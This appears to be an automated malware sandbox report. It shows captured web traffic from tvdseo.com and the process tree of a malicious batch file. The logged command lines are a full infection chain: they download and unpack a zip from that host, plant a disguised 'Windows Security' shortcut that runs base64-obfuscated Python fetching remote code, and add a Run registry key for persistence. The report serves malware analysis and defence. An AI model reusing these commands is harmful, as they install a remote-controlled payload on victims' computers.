              Data Ascii: ch V SEO &raquo; Dng bnh lun" href="https://tvdseo.com/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"htt
              2024-11-25 17:01:14 UTC1369INData Raw: 5c 75 64 63 37 66 22 29 3b 63 61 73 65 22 65 6d 6f 6a 69 22 3a 72 65 74 75 72 6e 21 6e 28 65 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 73 65 6c 66 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 3f 6e 65 77 20 4f 66 66 73 63 72 65 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74
              Data Ascii: \udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.get
              2024-11-25 17:01:14 UTC1369INData Raw: 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 20 69 6e 20 65 29 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 3d 3d 74 26 26 28 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79
              Data Ascii: n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.every
              2024-11-25 17:01:14 UTC1369INData Raw: 3a 20 27 47 6f 6f 67 6c 65 53 61 6e 73 27 3b 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 73 72 63 3a 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 74 76 64 73 65 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 34 2f 30 39 2f 47 6f 6f 67 6c 65 53 61 6e 73 2d 42 6f 6c 64 2e 74 74 66 27 29 20 66 6f 72 6d 61 74 28 27 74 72 75 65 74 79 70 65 27 29 3b 0a 7d 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 47 6f 6f 67 6c 65 53 61 6e 73 27 3b 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 09 73 72 63 3a 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 74 76 64 73 65 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 34 2f 30 39 2f 47 6f
              Data Ascii: : 'GoogleSans';font-weight: 700;src: url('https://tvdseo.com/wp-content/uploads/2024/09/GoogleSans-Bold.ttf') format('truetype');}@font-face {font-family: 'GoogleSans';font-weight: 400;src: url('https://tvdseo.com/wp-content/uploads/2024/09/Go
              2024-11-25 17:01:14 UTC1369INData Raw: 3b 2d 2d 77 70 2d 62 6c 6f 63 6b 2d 73 79 6e 63 65 64 2d 63 6f 6c 6f 72 2d 2d 72 67 62 3a 31 32 32 2c 30 2c 32 32 33 3b 2d 2d 77 70 2d 62 6f 75 6e 64 2d 62 6c 6f 63 6b 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 77 70 2d 62 6c 6f 63 6b 2d 73 79 6e 63 65 64 2d 63 6f 6c 6f 72 29 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 3a 72 6f 6f 74 7b 2d 2d 77 70 2d 61 64 6d 69 6e 2d 62 6f 72 64 65 72 2d 77 69 64 74 68 2d 66 6f 63 75 73 3a 31 2e 35 70 78 7d 7d 2e 77 70 2d 65 6c 65 6d 65 6e 74 2d 62 75 74 74 6f 6e 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 3a 72 6f 6f 74 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6e 6f 72 6d 61 6c 3a 31 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74
              Data Ascii: ;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color)}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.wp-element-button{cursor:pointer}:root{--wp--preset--font-size--normal:16px;--wp--preset
              2024-11-25 17:01:14 UTC1369INData Raw: 3a 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 68 75 67 65 29 7d 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 63 65 6e 74 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 6c 65 66 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 7d 23 65 6e 64 2d 72 65 73 69 7a 61 62 6c 65 2d 65 64 69 74 6f 72 2d 73 65 63 74 69 6f 6e 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 7d 2e 69 74 65 6d 73 2d 6a 75 73 74 69 66 69 65 64 2d 6c 65 66 74 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65
              Data Ascii: :var(--wp--preset--font-size--huge)}.has-text-align-center{text-align:center}.has-text-align-left{text-align:left}.has-text-align-right{text-align:right}#end-resizable-editor-section{display:none}.aligncenter{clear:both}.items-justified-left{justify-conte


              Click to jump to process

              Click to jump to process

              Click to dive into process behavior distribution

              Click to jump to process

              Target ID:0
              Start time:12:01:01
              Start date:25/11/2024
              Path:C:\Windows\System32\cmd.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\JDHh9P2IVM.bat" "
              Imagebase:0x7ff6b03f0000
              File size:289'792 bytes
              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:1
              Start time:12:01:01
              Start date:25/11/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff66e660000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:3
              Start time:12:01:03
              Start date:25/11/2024
              Path:C:\Windows\System32\chcp.com
              Wow64 process (32bit):false
              Commandline:chcp 65001
              Imagebase:0x7ff765330000
              File size:14'848 bytes
              MD5 hash:33395C4732A49065EA72590B14B64F32
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:moderate
              Has exited:true

              Target ID:4
              Start time:12:01:04
              Start date:25/11/2024
              Path:C:\Windows\System32\taskkill.exe
              Wow64 process (32bit):false
              Commandline:taskkill /F /IM synaptics.exe
              Imagebase:0x7ff7fe4f0000
              File size:101'376 bytes
              MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:moderate
              Has exited:true

              Target ID:5
              Start time:12:01:05
              Start date:25/11/2024
              Path:C:\Windows\System32\cmd.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://tvdseo.com/file/synaptics.zip', [System.IO.Path]::GetTempPath() + 'EAnLaxUKaI.zip') "
              Imagebase:0x7ff6b03f0000
              File size:289'792 bytes
              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:6
              Start time:12:01:05
              Start date:25/11/2024
              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Imagebase:0x7ff6e3d50000
              File size:452'608 bytes
              MD5 hash:04029E121A0CFA5991749937DD22A1D9
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:7
              Start time:12:01:14
              Start date:25/11/2024
              Path:C:\Windows\System32\cmd.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo $dst = [System.IO.Path]::Combine([System.Environment]::GetFolderPath('LocalApplicationData'), 'EAnLaxUKaI'); Add-Type -AssemblyName System.IO.Compression.FileSystem; if (Test-Path $dst) { Remove-Item -Recurse -Force "$dst\*" } else { New-Item -ItemType Directory -Force $dst } ; [System.IO.Compression.ZipFile]::ExtractToDirectory([System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), 'EAnLaxUKaI.zip'), $dst) "
              Imagebase:0x7ff6b03f0000
              File size:289'792 bytes
              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:8
              Start time:12:01:14
              Start date:25/11/2024
              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Imagebase:0x7ff6e3d50000
              File size:452'608 bytes
              MD5 hash:04029E121A0CFA5991749937DD22A1D9
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:9
              Start time:12:01:15
              Start date:25/11/2024
              Path:C:\Windows\System32\cmd.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo $s = $payload = "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vdHZkc2VvLmNvbS9maWxlL1BYQS9QWEFfUFVSRV9FTkMnKS5yZWFkKCkuZGVjb2RlKCd1dGYtOCcpKSk='))";$obj = New-Object -ComObject WScript.Shell;$link = $obj.CreateShortcut("$env:LOCALAPPDATA\WindowsSecurity.lnk");$link.WindowStyle = 7;$link.TargetPath = "$env:LOCALAPPDATA\EAnLaxUKaI\synaptics.exe";$link.IconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13";$link.Arguments = "-c `"$payload`"";$link.Save() "
              Imagebase:0x7ff6b03f0000
              File size:289'792 bytes
              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:10
              Start time:12:01:15
              Start date:25/11/2024
              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Imagebase:0x7ff6e3d50000
              File size:452'608 bytes
              MD5 hash:04029E121A0CFA5991749937DD22A1D9
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:12
              Start time:12:01:18
              Start date:25/11/2024
              Path:C:\Windows\System32\cmd.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security' -PropertyType String -Value 'C:\Windows\Explorer.EXE C:\Users\user\AppData\Local\WindowsSecurity.lnk' -Force "
              Imagebase:0x7ff6b03f0000
              File size:289'792 bytes
              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:13
              Start time:12:01:18
              Start date:25/11/2024
              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Imagebase:0x7ff6e3d50000
              File size:452'608 bytes
              MD5 hash:04029E121A0CFA5991749937DD22A1D9
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:14
              Start time:12:01:20
              Start date:25/11/2024
              Path:C:\Windows\System32\cmd.exe
              Wow64 process (32bit):false
              Commandline:cmd.exe /c start "" "C:\Users\user\AppData\Local\EAnLaxUKaI\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vdHZkc2VvLmNvbS9maWxlL1BYQS9QWEFfUFVSRV9FTkMnKS5yZWFkKCkuZGVjb2RlKCd1dGYtOCcpKSk='))"
              Imagebase:0x7ff6b03f0000
              File size:289'792 bytes
              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:17
              Start time:12:01:29
              Start date:25/11/2024
              Path:C:\Windows\explorer.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\Explorer.EXE" C:\Users\user\AppData\Local\WindowsSecurity.lnk
              Imagebase:0x7ff609140000
              File size:5'141'208 bytes
              MD5 hash:662F4F92FDE3557E86D110526BB578D5
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Has exited:false

              Target ID:18
              Start time:12:01:29
              Start date:25/11/2024
              Path:C:\Windows\explorer.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
              Imagebase:0x7ff609140000
              File size:5'141'208 bytes
              MD5 hash:662F4F92FDE3557E86D110526BB578D5
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Has exited:false

              No disassembly